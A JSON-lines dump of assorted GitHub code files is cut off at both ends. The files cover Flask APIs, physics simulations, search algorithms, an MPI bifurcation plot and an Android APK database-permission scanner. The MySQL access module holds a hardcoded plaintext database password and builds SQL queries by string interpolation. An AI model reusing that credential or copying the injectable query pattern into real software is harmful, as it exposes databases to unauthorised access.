\"upperCI95\":2.829})\n scoring.append({\"Mean\":0.828, \"STDDEV\":0.690, \"lowCI95\":0.069, \"upperCI95\":2.484})\n\n s = [[], []]\n s[0] = dict_to_list(scoring[NewDrop1], drop1)\n s[1] = dict_to_list(scoring[NewDrop2], drop2)\n return render_template('score.html', message = s)\n\n else:\n return render_template('score.html')\n\ndef score_drop(drop):\n if drop == \"Original\":\n return 0\n elif drop == \"Transit\":\n return 1\n elif drop == \"MBTA\":\n return 2\n elif drop == \"BUS\":\n return 3\n else:\n return \"error\"\n\ndef dict_to_list(dic, id):\n l = []\n l.append(id)\n l.append(dic['Mean'])\n l.append(dic['STDDEV'])\n l.append(dic['lowCI95'])\n l.append(dic['upperCI95'])\n return l\n\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"data-mechanics/course-2017-fal-proj","sub_path":"cyyan_liuzirui_yjunchoi_yzhang71/visualization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24879319317","text":"from flask import Flask, send_from_directory\nfrom flask_restful import Api, Resource, reqparse\nfrom flask_cors import CORS #comment this on deployment\n# from FirebaseApiHandler import *\nfrom SpreadsheetApiHandler import *\n#MAKE SURE ONLY ONE ApiHandler is uncommented\n\napp = Flask(__name__, static_url_path='', static_folder='frontend/build') # should i change this?\nCORS(app) #comment this on deployment\napi = Api(app)\n\n@app.route(\"/\", defaults={'path':''})\ndef serve(path):\n return send_from_directory(app.static_folder,'index.html')\n\n\"\"\"\nFirebaseApiHandler Urls\n\"\"\"\n# api.add_resource(TimeSeriesApiHandler, '/firebase///')\n# api.add_resource(ImageApiHandler, '/firebase/images')\n# api.add_resource(DataApiHandler, '/firebase//')\n# api.add_resource(AveragesHandler, '/firebase/averages///')\n# api.add_resource(VelocityHandler, '/firebase/velocity///')\n# api.add_resource(PositionHandler, '/firebase/position///')\n# api.add_resource(FourierTransformHandler, '/firebase/fouriertransform//')\n\n# api.add_resource(PitchesHandler, '/firebase/pitches//')\n# api.add_resource(AnglesHandler, '/firebase/angles//')\n# api.add_resource(FrequencyHandler, '/firebase/frequency//')\n# api.add_resource(AmplitudeHandler, '/firebase/amplitude//')\n# api.add_resource(SideBiasHandler, '/firebase/sidebias//')\n# api.add_resource(MoodHandler, '/firebase/mood//')\n# api.add_resource(HappyPhotoHandler, '/firebase/happyphoto//')\n# api.add_resource(SpreadsheetHandler, '/firebase/spreedsheet/')\n\n\"\"\"\nSpreedSheetApiHandler Urls\n\"\"\"\napi.add_resource(PitchesHandler, '/spreadsheet/pitches/')\napi.add_resource(AnglesHandler, '/spreadsheet/angles/')\napi.add_resource(FrequencyHandler, '/spreadsheet/frequency/')\napi.add_resource(AmplitudeHandler, '/spreadsheet/amplitude/')\napi.add_resource(SideBiasHandler, '/spreadsheet/sidebias/')\napi.add_resource(MoodHandler, '/spreadsheet/mood/')\napi.add_resource(HappyPhotoHandler, '/spreadsheet/happyphoto/')\n","repo_name":"bmw54/woofwoofwearables","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2278872747","text":"import csv\nimport io\nimport os\nimport pickle\nimport sys\nimport cv2\nimport time\nimport tempfile\nimport numpy as np\n\nfrom wrappers.face_classification import fc_face_attributes\nfrom wrappers.ms import ms_face_attributes\n\nTEST_SIZE = 1000\nHISTORY_FILE = 'fre2013_test.pickle'\n\nif __name__ == '__main__':\n\n i = predicted = 0\n\n if not os.path.exists(HISTORY_FILE):\n history = []\n else:\n history = pickle.load(open(HISTORY_FILE, 'rb'))\n\n for row in csv.DictReader(open('data/fer2013.csv')):\n if row['Usage'] != 'PublicTest':\n continue\n i += 1\n if i >= TEST_SIZE:\n break\n if len(history) >= i:\n predicted += history[i-1]\n else:\n img_file = io.BytesIO(bytearray(map(int, row['pixels'].strip().split(' '))))\n tmp_img_path = os.path.join(tempfile.gettempdir(), 'afacefer2013.png')\n image = np.asarray(row['pixels'].strip().split(' '), dtype=np.uint8).reshape((48, 48, 1))\n cv2.imwrite(tmp_img_path, image)\n # ret1 = fc_face_attributes(tmp_img_path)\n ret2 = ms_face_attributes(tmp_img_path)\n print('ms', ret2)\n if ret2 and int(row['emotion']) == ret2['emotion']:\n predicted += 1\n history.append(1)\n else:\n history.append(0)\n pickle.dump(history, open(HISTORY_FILE, 'wb'))\n time.sleep(5)\n\n print(f'{predicted/i:.0%} ({i})')\n # cv2.imshow('img', image)\n # cv2.waitKey(0)\n #print('fc', ret1)\n\n #\n #\n # for i in range(48):\n # for j in range(48):\n # px = int(pxs[i*48 + j])\n # image[i][j] = px\n # print(type(image), image.shape, image)\n # #img = cv2.imdecode(image, cv2.IMREAD_GRAYSCALE)\n # cv2.imshow('img', image)\n # cv2.imwrite('test.png', image)\n # cv2.waitKey(0)\n # print(row)\n # break\n","repo_name":"sheh/ml-meetups","sub_path":"180801/faceapi/fer2013_test.py","file_name":"fer2013_test.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70203252995","text":"from django.db import models\nfrom django.db.models import Count, Q, F\n\nfrom common.date_utils import get_today_date\nfrom user.models import User\n\n\nclass Objective(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, null=False)\n objective_text = models.TextField(null=False)\n\n def __str__(self):\n return self.objective_text\n\n class Meta:\n db_table = \"objective\"\n\n @staticmethod\n def get_on_track_summary():\n from key_result.models import KeyResult\n\n result = Objective.objects.filter(user__team__isnull=False).aggregate(\n total_count=Count('pk', distinct=True),\n not_on_track_count=Count('pk', filter=Q(keyresult__status=KeyResult.StatusChoice.IN_PROGRESS,\n keyresult__due_date__lt=get_today_date()))\n )\n\n return result\n\n @staticmethod\n def get_on_track_dept_wise_summary():\n from key_result.models import KeyResult\n\n result_list = Objective.objects.filter(user__team__isnull=False).values(\n department_name=F('user__team__department__name')).annotate(\n total_count=Count('pk', distinct=True),\n not_on_track_count=Count(\n 'pk', filter=Q(keyresult__status=KeyResult.StatusChoice.IN_PROGRESS,\n keyresult__due_date__lt=get_today_date()), distinct=True),\n users_count=Count('user__id', distinct=True),\n department_id=F('user__team__department__id')\n )\n\n return list(result_list)\n\n @staticmethod\n def get_on_track_team_wise_summary_for_a_dept(department_id):\n from key_result.models import KeyResult\n\n result_list = Objective.objects.filter(\n user__team__isnull=False, user__team__department_id=department_id).values(\n team_id=F('user__team__id')).annotate(\n total_count=Count('pk', distinct=True),\n not_on_track_count=Count(\n 'pk', filter=Q(keyresult__status=KeyResult.StatusChoice.IN_PROGRESS,\n keyresult__due_date__lt=get_today_date()), distinct=True),\n team_lead_name=F('user__team__team_lead__first_name')\n )\n\n return list(result_list)\n","repo_name":"VimalParthan/betterworks_analytics","sub_path":"objective/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14482208323","text":"from .applier_frontend import applier_frontend\nfrom .appliers.control import control\nfrom util.logging import slogm\n\nimport logging\n\nclass control_applier(applier_frontend):\n _registry_branch = 'Software\\\\BaseALT\\\\Policies\\\\Control'\n\n def __init__(self, storage):\n self.storage = storage\n self.control_settings = self.storage.filter_hklm_entries('Software\\\\BaseALT\\\\Policies\\\\Control%')\n self.controls = list()\n\n def apply(self):\n '''\n Trigger control facility invocation.\n '''\n for setting in self.control_settings:\n valuename = setting.hive_key.rpartition('\\\\')[2]\n try:\n self.controls.append(control(valuename, int(setting.data)))\n logging.info(slogm('Working with control {}'.format(valuename)))\n except Exception as exc:\n logging.info(slogm('Unable to work with control {}: {}'.format(valuename, exc)))\n #for e in polfile.pol_file.entries:\n # print('{}:{}:{}:{}:{}'.format(e.type, e.data, e.valuename, e.keyname))\n for cont in self.controls:\n cont.set_control_status()\n\n","repo_name":"ekorneechev/gpupdate","sub_path":"gpoa/frontend/control_applier.py","file_name":"control_applier.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"20516330245","text":"import pymysql\nfrom pymysql.err import OperationalError\nfrom schemas import Session, Action, Event\nfrom datetime import datetime\nfrom typing import Optional, List\n\npymysql_config = {\n 'user': 'cloudFunction',\n 'password': '$D>rj>!rr4?w6=V^Sa^z',\n 'db': 'sentinoodlev2',\n 'charset': 'utf8mb4',\n 'cursorclass': pymysql.cursors.DictCursor,\n 'autocommit': True\n}\n\nCONNECTION_NAME = 'sentinoodle:europe-west2:sentinoodle-events'\n\n# Create SQL connection globally to enable reuse\n# PyMySQL does not include support for connection pooling\nDB = None\n\n\ndef __get_cursor():\n \"\"\"\n Helper function to get a cursor.\n PyMySQL does NOT automatically reconnect, so we must reconnect explicitly using ping().\n \"\"\"\n try:\n return DB.cursor()\n except OperationalError:\n DB.ping(reconnect=True)\n return DB.cursor()\n\n\ndef ensure_db_connection():\n global DB\n\n if not DB:\n try:\n DB = pymysql.connect(**pymysql_config)\n except OperationalError:\n # If production settings fail, use local development ones\n pymysql_config['unix_socket'] = f'/cloudsql/{CONNECTION_NAME}'\n DB = pymysql.connect(**pymysql_config)\n\n\ndef insert_event_into_table(id: str, session_id: int, event_name: str, published_at: str, room: str) -> None:\n event_insert_query = f\"\"\"\n INSERT INTO event (id, session_id, event_name, published_at, room)\n VALUES (\n '{id}',\n {session_id},\n '{event_name}',\n STR_TO_DATE('{published_at[:-1]}000', '%Y-%m-%dT%H:%i:%s.%f'),\n '{room}');\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(event_insert_query)\n\n\ndef get_session_info(device_id: str) -> Session:\n fetch_session_query = f\"\"\"\n SELECT *\n FROM session\n WHERE device_id = '{device_id}'\n ORDER BY datetime_started DESC\n LIMIT 1;\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(fetch_session_query)\n\n session_record = cursor.fetchone()\n return Session(**session_record)\n\n\ndef get_last_action(session_id: int) -> Optional[Action]:\n fetch_last_action = f\"\"\"\n SELECT a.id, triggering_event_id, `type` AS action_type, body, action_taken\n FROM `action` a\n JOIN event e ON triggering_event_id = e.id\n WHERE session_id = {session_id}\n ORDER BY published_at DESC\n LIMIT 1;\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(fetch_last_action)\n\n action = cursor.fetchone()\n if action is None:\n return None\n else:\n return Action(**action)\n\n\ndef get_events_today(session_id: int) -> List[Event]:\n fetch_events_today = f\"\"\"\n SELECT *\n FROM event\n WHERE session_id = {session_id}\n AND DATE(published_at) = CURRENT_DATE();\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(fetch_events_today)\n\n return [Event(**event) for event in cursor.fetchall()]\n\n\ndef get_messages(session_id: int) -> List[str]:\n get_messages_query = f\"\"\"\n SELECT message_text\n FROM message\n WHERE session_id = {session_id};\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(get_messages_query)\n\n messages = [message[\"message_text\"] for message in cursor.fetchall()]\n return messages\n\n\ndef update_message_index(session_id: int, new_index_value: int) -> None:\n update_index_query = f\"\"\"\n UPDATE session\n SET message_index = {new_index_value}\n WHERE id = {session_id};\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(update_index_query)\n\n\ndef insert_action_into_table(triggering_event_id: str, action_type: str, body: str):\n action_insert_query = f\"\"\"\n INSERT INTO `action` (triggering_event_id, `type`, body, action_taken)\n VALUES (\n '{triggering_event_id}',\n '{action_type}',\n '{body}',\n NOW());\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(action_insert_query)\n","repo_name":"scan-lan/sentinoodleMotionHandler","sub_path":"dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6243039735","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nsample_rate = 48e3\nfreq = 7e3\nN = 256\nn = np.arange(N)\ny = np.sin(2 * np.pi * freq \\\n * (n / sample_rate)) \\\n + np.random.normal(\n 0, .1, N)\nplt.plot(n, y)\nplt.title('Signal over Time')\nplt.ylabel('Amplitude')\nplt.xlim(0, N)\nplt.xlabel('Time (samples)')\nplt.savefig(\"exampleplt.png\")\n","repo_name":"testaco/dcc2014","sub_path":"preso/img/exampleplt.py","file_name":"exampleplt.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"23387251701","text":"def checkrow(ind,jnd, n ,m):\r\n for k in xrange(m):\r\n if(int(a[ind][k]) !=1):\r\n return False\r\n return True\r\ndef checkcol(ind,jnd, n ,m):\r\n for k in xrange(n):\r\n if(int(a[k][jnd]) !=1):\r\n return False\r\n return True\r\n\r\nT = int(raw_input())\r\na = []\r\nfor testcase in xrange(T):\r\n a = []\r\n nm = (raw_input()).split(' ')\r\n n = int(nm[0])\r\n m = int(nm[1])\r\n sucess = True\r\n for rows in range(n):\r\n row = (raw_input()).split(' ')\r\n a.append(row)\r\n for i in xrange(n):\r\n for j in xrange(m):\r\n if int(a[i][j]) == 1:\r\n if(not (checkrow(i,j , n,m) or checkcol(i,j , n,m) )):\r\n sucess = False\r\n break\r\n if(not sucess):\r\n print(\"Case #\"+str(testcase+1)+\": NO\")\r\n break\r\n if (sucess):\r\n print(\"Case #\"+str(testcase+1)+\": YES\")\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/1508.py","file_name":"1508.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34241692098","text":"from .geo_base import GeoObject\nfrom .point_vector import Point3D\n\n\nclass Triangle(GeoObject):\n def __init__(self, point_a, point_b, point_c, material):\n self.a = Point3D(point_a)\n self.b = Point3D(point_b)\n self.c = Point3D(point_c)\n self.u = self.a.vector_to(self.b)\n self.w = self.a.vector_to(self.c)\n self.material = material\n\n def intersection_param(self, ray):\n p = self.a.vector_to(ray.origin)\n dw = ray.direction % self.w\n dwu = dw * self.u\n\n if dwu == 0:\n return None\n pu = p % self.u\n r = dw * p / dwu\n s = pu * ray.direction / dwu\n if 0 <= r and r <= 1 and 0 <= s and s <= 1 and r+s <= 1:\n return pu * self.w / dwu\n else:\n return None\n\n def normal_vec_at(self, p):\n return (self.u % self.w).normalize()\n","repo_name":"SicktorHass/RayTracer2019","sub_path":"src/geo_objects/triangles.py","file_name":"triangles.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"300821536","text":"from ..Base import Base\nfrom ..info import Info\nfrom ..apk import register\nfrom ..tools import *\n\nTITLE = 'Arbitrary read and write detection of database files'\nLEVEL = 2\nINFO = 'Detect whether there is any risk of reading and writing database files in the App'\n\n\nclass DBCheck(Base):\n def scan(self):\n strline = cmdString('grep -r \"Landroid/content/Context;->openOrCreateDatabase\" ' + self.appPath)\n paths = getSmalis(os.popen(strline).readlines())\n results = []\n for path in paths:\n with open(path, 'r') as f:\n lines = f.readlines()\n lines.reverse()\n count = len(lines)\n name = getFileName(path)\n for i in range(0, count):\n line = lines[i]\n if 'Landroid/content/Context;->openOrCreateDatabase' in line:\n v = line.split(',')[2]\n for j in range(i, count):\n ll = lines[j]\n if 'const/4' in ll and v in ll:\n value = ll.strip().split(' ')[-1]\n if value != '0x0':\n result = name + ' : ' + str(count - i)\n if result not in results:\n results.append(result)\n break\n Info(key=self.__class__, title=TITLE, level=LEVEL, info=INFO, result='\\n'.join(results)).description()\n\n\nregister(DBCheck)","repo_name":"Ba-hub/R3verseBug","sub_path":"lib/Android/DBCheck.py","file_name":"DBCheck.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"21193887508","text":"######################################################\n# Nama file: readline.py\n######################################################\n\ndef main():\n # membuka file\n f = open(\"data.txt\", \"r\")\n\n # membaca data tiap baris\n while True:\n baris = f.readline()\n if not baris: # EOF (end of file)\n break\n print(baris, end='')\n\n # menutup file\n f.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"romanbatavi/kickstarter-python","sub_path":"bab/bab-7/readline.py","file_name":"readline.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30235114634","text":"import pandas as pd\n#uniform cost search\nfrom pandas import DataFrame\n_city_info = None\n\n_frontier_priority = []\n\nclass Node:\n def __init__(self, state, parent, action, path_cost):\n self.state = state\n self.parent = parent\n self.action = action\n self.path_cost = path_cost\n\ndef main():\n global _frontier_priority\n import_city_info()\n citys = []\n src_state = input('start_state:')\n des_state = input('des_state:')\n node = uniform_cost_search(src_state, des_state)\n if not node:\n print('find goal failed')\n else:\n while True:\n if node == None:\n break\n else:\n citys.append(node.state)\n node = node.parent\n size = len(citys)\n for i in range(size):\n if i < size - 1:\n print('%s->' % citys.pop(), end='')\n else:\n print(citys.pop())\n\ndef import_city_info():\n global _city_info\n data = [{'city1': 'Oradea', 'city2': 'Zerind', 'path_cost': 71},\n {'city1': 'Oradea', 'city2': 'Sibiu', 'path_cost': 151},\n {'city1': 'Zerind', 'city2': 'Arad', 'path_cost': 75},\n {'city1': 'Arad', 'city2': 'Sibiu', 'path_cost': 140},\n {'city1': 'Arad', 'city2': 'Timisoara', 'path_cost': 118},\n {'city1': 'Timisoara', 'city2': 'Lugoj', 'path_cost': 111},\n {'city1': 'Lugoj', 'city2': 'Mehadia', 'path_cost': 70},\n {'city1': 'Mehadia', 'city2': 'Drobeta', 'path_cost': 75},\n {'city1': 'Drobeta', 'city2': 'Craiova', 'path_cost': 120},\n {'city1': 'Sibiu', 'city2': 'Fagaras', 'path_cost': 99},\n {'city1': 'Sibiu', 'city2': 'Rimnicu Vilcea', 'path_cost': 80},\n {'city1': 'Rimnicu Vilcea', 'city2': 'Craiova', 'path_cost': 146},\n {'city1': 'Rimnicu Vilcea', 'city2': 'Pitesti', 'path_cost': 97},\n {'city1': 'Craiova', 'city2': 'Pitesti', 'path_cost': 138},\n {'city1': 'Fagaras', 'city2': 'Bucharest', 'path_cost': 211},\n {'city1': 'Pitesti', 'city2': 'Bucharest', 'path_cost': 101},\n {'city1': 'Bucharest', 'city2': 'Giurgiu', 'path_cost': 90},\n {'city1': 'Bucharest', 'city2': 'Urziceni', 'path_cost': 85},\n {'city1': 'Urziceni', 'city2': 'Vaslui', 'path_cost': 142},\n {'city1': 'Urziceni', 'city2': 'Hirsova', 'path_cost': 98},\n {'city1': 'Neamt', 'city2': 'Iasi', 'path_cost': 87},\n {'city1': 'Iasi', 'city2': 'Vaslui', 'path_cost': 92},\n {'city1': 'Hirsova', 'city2': 'Eforie', 'path_cost': 86}]\n\n _city_info = DataFrame(data, columns=['city1', 'city2', 'path_cost'])\n\n\ndef is_node_in_frontier(frontier, child):\n for x in frontier:\n if child.state == x.state:\n return True\n return False\n\ndef uniform_cost_search(src_state, des_state):\n global _city_info\n global _frontier_priority\n node = Node(src_state, None, None, 0)\n _frontier_priority_add(node)\n visited = []\n while True:\n if len(_frontier_priority) == 0:\n return False\n node = _frontier_priority.pop(0)\n if node.state == des_state:\n print('find goals!')\n return node\n visited.append(node)\n for i in range(len(_city_info)):\n des_city = ''\n if _city_info['city1'][i] == node.state:\n des_city = _city_info['city2'][i]\n elif _city_info['city2'][i] == node.state:\n des_city = _city_info['city1'][i]\n if des_city == '':\n continue\n child = Node(des_city, node, 'go', node.path_cost + _city_info['path_cost'][i])\n if child.state not in visited and not is_node_in_frontier(_frontier_priority, child):\n _frontier_priority_add(child)\n elif is_node_in_frontier(_frontier_priority, child):\n _frontier_priority_replace(child)\n\ndef _frontier_priority_add(node):\n global _frontier_priority\n size = len(_frontier_priority)\n for i in range(size):\n if node.path_cost < _frontier_priority[i].path_cost:\n _frontier_priority.insert(i, node)\n return\n _frontier_priority.append(node)\n\ndef _frontier_priority_replace(child):\n global _frontier_priority\n size = len(_frontier_priority)\n for i in range(size):\n if child.state == _frontier_priority[i].state and child.path_cost < _frontier_priority[i].path_cost:\n _frontier_priority[i] = child\n return\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"han1254/IntroductionToAI","sub_path":"chapt3/3_4_2_ucs.py","file_name":"3_4_2_ucs.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14963578577","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Dec 03 14:56:47 2016\r\n\r\n@author: admin12\r\n\"\"\"\r\n\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\nGMs = 4 * (math.pi**2)\r\n\r\ndef initial(a,e): \r\n x0=a*(1+e) \r\n y0=0 \r\n v_x0=0 \r\n v_y0=2 * math.pi * math.sqrt((1-e)/(a*(1+e))) \r\n return [x0,y0,v_x0,v_y0]\r\n\r\ndef orbit(a, e, theta0, dt, total_time):\r\n q = initial(1 ,e)\r\n x0 = q[0]\r\n y0 = q[1]\r\n v_x0 = q[2]\r\n v_y0 = q[3]\r\n x = [x0]\r\n y = [y0]\r\n vx = [v_x0]\r\n vy = [v_y0]\r\n t = [0]\r\n omega = [0]\r\n theta = [theta0]\r\n while t[-1] < total_time:\r\n r=math.sqrt(x[-1]**2 + y[-1]**2)\r\n newvx = vx[-1] - GMs * x[-1] / (r ** 3) * dt\r\n newx = x[-1] + newvx * dt\r\n newvy = vy[-1] - GMs * y[-1] / (r ** 3) * dt\r\n newy = y[-1] + newvy * dt\r\n vx.append(newvx)\r\n vy.append(newvy)\r\n x.append(newx)\r\n y.append(newy)\r\n newomega = omega[-1] - 3 * GMs / (r ** 5) * (x[-1] * math.sin(theta[-1]) - y[-1] * math.cos(theta[-1])) * (x[-1] * math.cos(theta[-1]) + y[-1] * math.sin(theta[-1])) * dt\r\n newtheta = theta[-1] + newomega * dt\r\n if newtheta >= math.pi:\r\n newtheta = newtheta - 2 * math.pi\r\n if newtheta <= -math.pi:\r\n newtheta = newtheta + 2 * math.pi\r\n omega.append(newomega)\r\n theta.append(newtheta)\r\n t.append(t[-1] + dt)\r\n return [vx, vy, x, y, omega, theta, t]\r\n\r\ndef dtheta(theta1, theta2):\r\n delta_theta = []\r\n for i in range(len(theta1)):\r\n delta_theta.append(abs(theta1[i] - theta2[i]))\r\n return delta_theta\r\n\r\nA = orbit(1, 0.7, 0, 0.0001, 7)\r\nA_theta = A[5]\r\nA_omega = A[4]\r\nA_t = A[6]\r\nx1 = A[2]\r\ny1 = A[3]\r\n\r\nB = orbit(1, 0.7, 0.01, 0.0001, 7)\r\nB_theta = B[5]\r\nB_omega = B[4]\r\nB_t = B[6]\r\n\r\nC = orbit(1, 0.3, 0, 0.0001, 7)\r\nC_theta = C[5]\r\nC_omega = C[4]\r\nC_t = C[6]\r\n\r\nD = orbit(1, 0.3, 0.01, 0.0001, 7)\r\nD_theta = D[5]\r\nD_omega = D[4]\r\nD_t = D[6]\r\n\r\nangle = dtheta(A_theta, B_theta)\r\nangle1 = dtheta(C_theta, D_theta)\r\n\r\nplt.figure(figsize=[10,5])\r\nplt.subplot(121)\r\nplt.plot(C_t, angle)\r\nplt.title('$\\Delta\\\\theta$ versus time')\r\nplt.xlabel('time(yr)')\r\nplt.ylabel('$\\Delta\\\\theta$(radians)')\r\nplt.text(3,0.00001,'Elliptical obit($e=0.7$)')\r\nplt.semilogy(0.0001, 0.1)\r\nplt.subplot(122)\r\nplt.plot(C_t, angle1)\r\nplt.title('$\\Delta\\\\theta$ versus time')\r\nplt.xlabel('time(yr)')\r\nplt.ylabel('$\\Delta\\\\theta$(radians)')\r\nplt.text(3,0.0000004,'Ellipticalr obit($e=0.3$)')\r\nplt.semilogy(0.0001, 0.1)\r\nplt.savefig('r',dpi=144)\r\n \r\n \r\n ","repo_name":"Zemel-Yang/computationalphysics_N2014301020092","sub_path":"Code/Hyperion.py","file_name":"Hyperion.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23009683244","text":"\nfrom mpi4py import MPI\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Initialization for parallelization\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n# Initialization for Bifurcation diagram\nsteps = 500\nn = [500, 330, 250, 200, 160, 140, 120]\nran = np.linspace(0, 4, size*n[size-2])\n\ndef bifurcation_map(r, x):\n return r*x*(1-x)\n\n# Initialization for who takes which piece of r\ndistr = len(ran)//(size)\n\nlist_of_distr = list(range(0, len(ran), distr))\nlist_of_distr.append(len(ran))\n\nlist_to_send = []\nfor i in range(len(list_of_distr)-1):\n list_to_send.append([list_of_distr[i],list_of_distr[i+1]])\n\n\n# Parallelization itself\nsendbuf = None\nRs_send = None\nif rank == 0:\n sendbuf = np.empty([size*n[size-2], steps], dtype='f')\n sendbuf.T[:,:] = range(size*n[size-2])\n\n Rs_send = np.empty([size*n[size-2], steps], dtype='f')\n Rs_send.T[:,:] = range(size*n[size-2])\n\nrecvbuf = np.empty((n[size-2], steps), dtype='f')\ncomm.Scatter(sendbuf, recvbuf, root=0)\n\nRs_res = np.empty((n[size-2], steps), dtype='f')\ncomm.Scatter(Rs_send, Rs_res, root=0)\n\nlist_to_send = list_to_send[rank]\n\nj = -1\nfor r in ran[list_to_send[0]:list_to_send[1]]:\n j += 1\n x = np.random.random()\n for i in range(steps):\n recvbuf[j, i] = x\n Rs_res[j, i] = r\n x = bifurcation_map(r, x)\n\ncomm.Barrier()\n\ncomm.Gather(recvbuf, sendbuf, root=0)\ncomm.Gather(Rs_res, Rs_send, root=0)\n\nif rank == 0:\n Rs_send = Rs_send[:,Rs_send.shape[1]//2:]\n sendbuf = sendbuf[:,sendbuf.shape[1]//2:]\n Rs_send = Rs_send.reshape(Rs_send.shape[0]*Rs_send.shape[1])\n sendbuf = sendbuf.reshape(sendbuf.shape[0]*sendbuf.shape[1])\n plt.figure(figsize=(9, 8))\n plt.title('Bifurcation map')\n plt.xlabel(\"r\")\n plt.ylabel(\"x\")\n plt.plot(Rs_send, sendbuf, 'r.', markersize=1)\n plt.grid()\n plt.pause(1)\n \n","repo_name":"lenaNzrva/HPPL","sub_path":"Bifurcation diagram/Nazarova_Parallel_Bifurcation_diagram.py","file_name":"Nazarova_Parallel_Bifurcation_diagram.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2395330988","text":"import sentry_sdk\nfrom fastapi import FastAPI\nfrom fastapi.staticfiles import StaticFiles\nfrom sentry_sdk.integrations.asgi import SentryAsgiMiddleware\nfrom starlette.middleware.cors import CORSMiddleware\n\nfrom app.api.api_v1.api import api_router\nfrom app.core.config import settings\nfrom app.core.logging import logger\nfrom app.kafka import producer\n\napp = FastAPI(\n title=settings.PROJECT_NAME, openapi_url=f\"{settings.API_V1_STR}/openapi.json\"\n)\n\nif settings.SENTRY_DSN_URL is not None:\n sentry_sdk.init(settings.SENTRY_DSN_URL)\n\n app.add_middleware(SentryAsgiMiddleware)\n\n\n@app.on_event(\"startup\")\nasync def startup_event():\n logger.info(\"starting kafka producer\")\n await producer.start()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_event():\n await producer.stop()\n\n\n# Set all CORS enabled origins\nif settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n expose_headers=[\"*\"],\n )\n\napp.include_router(api_router, prefix=settings.API_V1_STR)\napp.mount(\n settings.IMAGE_URL_PREFIX,\n StaticFiles(directory=settings.IMAGE_STATIC_DIR),\n name=\"image\",\n)\n","repo_name":"OpenChemistry/distiller","sub_path":"backend/app/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23586984201","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 15 21:31:02 2017\r\n\r\n@author: Ameet\r\n\"\"\"\r\nimport decimal\r\n\r\n\r\nimport decimal\r\nimport math\r\nimport itertools\r\n\r\ndef get_surface_area(pancakes):\r\n side_area = sum([2*decimal.Decimal(math.pi)*p[0]*p[1] for p in pancakes])\r\n max_r = max([p[0] for p in pancakes])\r\n top_areas = decimal.Decimal(math.pi)*decimal.Decimal(max_r)**2\r\n #print(pancakes,side_area + top_areas)\r\n \r\n return side_area + top_areas\r\n\r\ndef get_best_stack_exhaustive(N, K, pancakes):\r\n best_area = 0\r\n for comb in itertools.combinations(pancakes, r=K):\r\n sa = get_surface_area(comb)\r\n if sa>best_area:\r\n best_area = sa\r\n \r\n return best_area\r\n\r\n\r\ndef get_best_stack(N, K, pancakes):\r\n assert(len(pancakes)>0)\r\n assert(N>0)\r\n assert(K>0)\r\n assert(len(pancakes)==N)\r\n \r\n \r\n max_surface_area = 